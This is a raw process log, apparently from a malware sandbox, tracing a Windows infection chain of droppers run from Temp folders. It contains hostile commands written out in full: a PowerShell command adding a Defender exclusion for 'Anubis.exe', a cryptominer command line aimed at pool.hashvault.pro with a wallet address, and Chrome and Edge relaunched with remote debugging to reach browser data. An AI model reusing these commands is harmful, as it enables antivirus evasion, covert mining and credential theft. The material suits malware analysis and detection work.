C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2788 -ip 2788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 808
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvlm5rn1\fvlm5rn1.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES35B1.tmp" "c:\Users\Admin\AppData\Local\Temp\fvlm5rn1\CSC1D221A13830145B39B7013BD391E7E61.TMP"
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4044 -ip 4044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 808
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\iSoxSIyN\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe0d36cc40,0x7ffe0d36cc4c,0x7ffe0d36cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1884 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2108,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4228 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4260,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:8
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5424,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5472 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe11fb46f8,0x7ffe11fb4708,0x7ffe11fb4718
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe
"C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2456 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5020 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5024 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2440 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3624 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5064 /prefetch:2
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe11fb46f8,0x7ffe11fb4708,0x7ffe11fb4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,18106494942960664179,16632825225270950601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1436"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe292346f8,0x7ffe29234708,0x7ffe29234718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2896 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4664 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
